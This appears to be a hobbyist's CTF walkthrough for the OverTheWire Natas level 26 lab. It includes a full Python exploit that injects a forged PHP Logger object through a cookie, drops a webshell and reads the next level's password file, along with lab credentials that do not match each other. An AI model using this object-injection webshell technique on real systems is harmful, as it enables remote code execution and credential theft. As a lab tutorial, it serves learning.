Part time CTF Player learn every day!!
🌠 I Love Hoshimachi Suisei!! 🌠
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Natas Level 25 → 26 tutorial!!

overthewire natas walkthrough ctf web beginner php object-injection serialization python requests

Published on 07 Jan 2024

URL: http://natas26.natas.labs.overthewire.org
Credentials: natas26:cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE

curl -u natas26:cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE 
  http://natas26.natas.labs.overthewire.org/

homepage

Task

The code reveals a drawing app that unserializes user data from the drawing cookie:

$drawing = unserialize(base64_decode($_COOKIE["drawing"]));

We also see a Logger class defined, with a __destruct() that writes $exitMsg into $logFile. This is a classic PHP Object Injection (POI) vulnerability:

We can send a forged Logger object via cookie.
When unserialized, it will be stored and later destroyed.
On destruction, the exitMsg (our PHP payload) is written to logFile (we choose a .php file in img/).
Then we simply request that .php file to run arbitrary code.

Full Python Exploit

#!/usr/bin/env python3
import base64, requests

BASE = "http://natas26.natas.labs.overthewire.org/"
AUTH = ("natas26", "oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T")

# Crafted Logger object:
#   logFile = "img/ax.php"
#   exitMsg = "<?php echo file_get_contents('/etc/natas_webpass/natas27');?>"
payload = (
    'O:6:"Logger":3:{'
    's:15:"LoggerlogFile";s:10:"img/ax.php";'
    's:15:"LoggerinitMsg";s:6:"foobar";'
    's:15:"LoggerexitMsg";s:61:"<?php echo file_get_contents(\'/etc/natas_webpass/natas27\');?>";}'
)

cookie_val = base64.b64encode(payload.encode()).decode()

with requests.Session() as s:
    s.auth = AUTH
    # 1) Send malicious cookie
    s.get(BASE, cookies={"drawing": cookie_val})
    print("[i] Sent malicious cookie, creating webshell...")

    # 2) Access the dropped PHP file
    shell_url = BASE + "img/ax.php"
    r2 = s.get(shell_url)
    print("[+] Response from shell:")
    print(r2.text.strip())

Run it:

python3 natas26_exploit.py

Output

[i] Sent malicious cookie, creating webshell...
[+] Response from shell:
u3RRffXjysjgwFU6b9xa23i6prmUsYne

result

Password

u3RRffXjysjgwFU6b9xa23i6prmUsYne

Troubleshooting

Got blank page? → Check that your payload uses img/ax.php and that you request that file after poisoning.
Cookie encoding wrong? → Ensure you base64-encode the serialized PHP string (and URL-encode if using curl).
Payload not executed? → Confirm the file ends with .php inside img/.

Boom 🎉 Another step forward: we exploited PHP object injection via unserialize() to gain code execution. On to natas27!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨

Cinema

OverTheWire Natas Level 25 → 26 tutorial!!

Login

Task

Full Python Exploit

Output

Password

Troubleshooting

Thanks for reading!

related posts

Feature Test Post

Service Clients & Automation for Wargames: Protocol RE, Robust Solvers, and FormulaOne + Maze Tie-ins

Protections & Bypass 101: NX/ASLR, Canaries, RELRO/PIE, and Practical Exploit Strategies (Behemoth + Utumno + Maze)

all tags